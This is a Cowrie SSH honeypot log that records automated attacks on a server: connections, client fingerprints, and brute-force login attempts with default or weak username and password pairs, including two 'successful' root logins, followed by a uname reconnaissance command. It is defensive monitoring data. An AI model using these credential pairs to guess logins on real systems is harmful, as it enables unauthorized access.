{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:14.747249Z","src_ip":"201.148.180.50","session":"6671a831e55d"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39916,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d5dbd607f23","protocol":"ssh","message":"New connection: 41.226.27.251:39916 (1.2.3.4:22) [session: 8d5dbd607f23]","sensor":"my-vps","timestamp":"2025-08-31T03:24:18.286545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:18.359282Z","src_ip":"41.226.27.251","session":"8d5dbd607f23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:18.360018Z","src_ip":"41.226.27.251","session":"8d5dbd607f23"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:18.544150Z","src_ip":"41.226.27.251","session":"8d5dbd607f23"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:24:19.488433Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:24:19.489179Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:19.759004Z","src_ip":"41.226.27.251","session":"8d5dbd607f23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35536,"dst_ip":"1.2.3.4","dst_port":22,"session":"eae4bc689731","protocol":"ssh","message":"New connection: 212.227.125.160:35536 (1.2.3.4:22) [session: eae4bc689731]","sensor":"my-vps","timestamp":"2025-08-31T03:24:25.806302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:24:25.807193Z","src_ip":"212.227.125.160","session":"eae4bc689731"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:24:26.057458Z","src_ip":"212.227.125.160","session":"eae4bc689731"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56922,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6a0b784c5f9","protocol":"ssh","message":"New connection: 212.227.125.160:56922 (1.2.3.4:22) [session: c6a0b784c5f9]","sensor":"my-vps","timestamp":"2025-08-31T03:24:26.451276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:27.060518Z","src_ip":"212.227.125.160","session":"c6a0b784c5f9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:24:27.061216Z","src_ip":"212.227.125.160","session":"c6a0b784c5f9"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":62739,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec4568e6c6bf","protocol":"ssh","message":"New connection: 79.127.48.196:62739 (1.2.3.4:22) [session: ec4568e6c6bf]","sensor":"my-vps","timestamp":"2025-08-31T03:24:27.069772Z"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"123qweasd","message":"login attempt [ansible/123qweasd] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:27.071687Z","src_ip":"212.227.125.160","session":"eae4bc689731"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:28.189654Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:28.191500Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:28.327733Z","src_ip":"212.227.125.160","session":"eae4bc689731"}
{"eventid":"cowrie.login.failed","username":"guest","password":"1234567","message":"login attempt [guest/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:29.728895Z","src_ip":"212.227.125.160","session":"c6a0b784c5f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"11.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:30.713228Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.session.closed","duration":"89.8","message":"Connection lost after 89.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:30.733539Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51936,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d49672b56f4","protocol":"ssh","message":"New connection: 212.227.235.229:51936 (1.2.3.4:22) [session: 1d49672b56f4]","sensor":"my-vps","timestamp":"2025-08-31T03:24:30.938196Z"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:31.217847Z","src_ip":"212.227.125.160","session":"c6a0b784c5f9"}
{"eventid":"cowrie.login.success","username":"root","password":"LifeChanging45","message":"login attempt [root/LifeChanging45] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:24:36.087202Z","src_ip":"79.127.48.196","session":"ec4568e6c6bf"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:36.107520Z","src_ip":"212.227.125.160","session":"627df075bc50"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56364,"dst_ip":"1.2.3.4","dst_port":22,"session":"591d241dbb68","protocol":"ssh","message":"New connection: 41.226.27.251:56364 (1.2.3.4:22) [session: 591d241dbb68]","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.697661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.699128Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.743427Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.876805Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.898776Z","src_ip":"212.227.235.229","session":"1d49672b56f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.900421Z","src_ip":"212.227.235.229","session":"1d49672b56f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:24:38.979985Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:24:38.980792Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:39.025498Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:39.026848Z","src_ip":"41.226.27.251","session":"591d241dbb68"}
{"eventid":"cowrie.session.closed","duration":"67.5","message":"Connection lost after 67.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:24:45.931443Z","src_ip":"212.227.125.160","session":"627df075bc50"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59340,"dst_ip":"1.2.3.4","dst_port":22,"session":"b341e1e45619","protocol":"ssh","message":"New connection: 41.226.27.251:59340 (1.2.3.4:22) [session: b341e1e45619]","sensor":"my-vps","timestamp":"2025-08-31T03:24:58.965048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:24:58.966177Z","src_ip":"41.226.27.251","session":"b341e1e45619"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:24:59.010218Z","src_ip":"41.226.27.251","session":"b341e1e45619"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:24:59.143661Z","src_ip":"41.226.27.251","session":"b341e1e45619"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:00.486383Z","src_ip":"41.226.27.251","session":"b341e1e45619"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46454,"dst_ip":"1.2.3.4","dst_port":22,"session":"04d64cd6510b","protocol":"ssh","message":"New connection: 212.227.235.229:46454 (1.2.3.4:22) [session: 04d64cd6510b]","sensor":"my-vps","timestamp":"2025-08-31T03:25:05.597338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:06.692167Z","src_ip":"212.227.235.229","session":"04d64cd6510b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:25:06.693336Z","src_ip":"212.227.235.229","session":"04d64cd6510b"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345678","message":"login attempt [guest/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T03:25:12.351978Z","src_ip":"212.227.235.229","session":"04d64cd6510b"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:14.378943Z","src_ip":"212.227.235.229","session":"04d64cd6510b"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:25:16.264332Z","src_ip":"212.227.235.229","session":"1d49672b56f4"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55412,"dst_ip":"1.2.3.4","dst_port":22,"session":"1166a3b1a57d","protocol":"ssh","message":"New connection: 41.226.27.251:55412 (1.2.3.4:22) [session: 1166a3b1a57d]","sensor":"my-vps","timestamp":"2025-08-31T03:25:19.073625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:25:19.074526Z","src_ip":"41.226.27.251","session":"1166a3b1a57d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:25:19.119792Z","src_ip":"41.226.27.251","session":"1166a3b1a57d"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:25:19.255867Z","src_ip":"41.226.27.251","session":"1166a3b1a57d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47950,"dst_ip":"1.2.3.4","dst_port":22,"session":"004559879d89","protocol":"ssh","message":"New connection: 212.227.125.160:47950 (1.2.3.4:22) [session: 004559879d89]","sensor":"my-vps","timestamp":"2025-08-31T03:25:19.840507Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:25:20.498312Z","src_ip":"41.226.27.251","session":"1166a3b1a57d"}
